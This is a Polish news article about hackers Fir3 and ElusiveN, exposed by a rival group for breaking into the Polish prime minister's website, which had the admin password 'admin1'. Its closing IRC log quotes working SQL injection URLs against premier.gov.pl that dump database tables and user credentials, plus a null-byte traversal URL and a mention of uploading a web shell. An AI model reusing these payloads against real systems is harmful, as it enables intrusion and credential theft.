Fir3 i ElusiveN odpowiedzialni za ataki na stronę premiera

Fir3 i ElusiveN to hakerzy, którzy zostali zdemaskowani przez.. inną grupę hakerską. Happyninjas oublikowała w Internecie i wysłała do organów śledczych materiały obciążające obu hakerów. Znalazły się w nich logi do serwera, rozmowy prowadzone na IRCu jak i ostrzeżenie dotyczące wcześniejszych działań dwóch młodocianych hakerów. Grupa zarzuca im ataki na sklepy internetowe i handel danymi klientów sklepów. Ich ofiarami padły między innymi serwery firmy freecast.pl i  hekko.pl , a do sieci przedostały się loginy i hasła 900 użytkowników Allegro.

Śledzctwo będzie trudne ze względu na fakt, że dokumenty obciążające obu uczestników włamania to tak naprawdę pliki tekstowe, które można łatwo spreparować. Choć specjaliści z biura rządowego potwierdzają wiarygodność logów serwera to jednak budzi kontrowersje sposób w jaki dostały się one w ręce grupy Happyninjas. Całkiem możliwe, że postępowanie śledcze zostanie wszczęte również przeciwko Happyninjas. Przypominam, że zabezpieczenie serwera było wyjątkowo mizerne, do włamania doszło przy użyciu hasła administratora "admin1" co jest prawdziwym kuriozum wśród metod zabezpieczeń systemów. Wątpliwości budzą zabezpieczenia stron rządowych, laptopów czy komórek polskich urzędników. Niedawno w Internecie zamieszczono zdjęcie laptopa premiera Donalda Tuska z naklejonym hasłem i loginem do systemu operacyjnego.

Na koniec przedstawiam rozmowę na IRCu:

00:29 <@patient> https://www.premier.gov.pl/admin/index.php?do=satan%00""xor ../"&ac=login
00:29 <@Fir3> hum ?;>
00:30 <@Fir3> lfi?
00:30 <@Fir3> sql ?
00:30 <@Fir3> ?;d
00:30 <@patient> nie
00:30 <@patient> czary-mary
00:30 <@patient> link kopiujcie dokladnie tak
00:31 <@patient> nie zamieniajcie NB na special chara od razu, ma to zrobic serwer
00:32 <@patient> panel sam w sobie moze wam nie dzialac
00:32 <@patient> ale wszystkie funkcje sa na zewnatrz
00:32 <@patient> wystarczy je wziasc, pozmieniac parametry i jazda ; d
00:32 <@patient> mamy premier.gov.pl
03:21 < GrigoriMaslov> https://www.premier.gov.pl/admin/index.php?do=side&ac=login&id=32%27%20and%201=0%20union%20select%201,
uNHex%28Hex%28table_name%29%29,3,5%20FROM%20
information_schema.columns--%20and%20%271%27%20=%271
03:38 <@Fir3> https://www.premier.gov.pl/admin/index.php?do=side&ac=login&id=32%27%20and%201=0%20union%20select%201,
uNHex%28Hex%28concat%28login,char%2832%29,passwd
%29%29%29,3,5%20FROM%20_users--%20and%20%271%27%20=%271
03:38 <@Fir3> ahahaha
03:38 <@Fir3> tyle sie najebali
03:38 <@Fir3> aby pass byl admin1
03:38 <@Fir3> ok wgrywam shella
04:12 <@Fir3> ! HACKED !

Tagi fir3 elusiven odpowiedzialni ataki strone premiera

W sumie każdy mógł się włamać. Teraz pytanie jak się zabezpieczyli, aby być anonimowym.

Autor (wymagane):
Treść (wymagane):
Przepisz kod z obrazka (wymagane):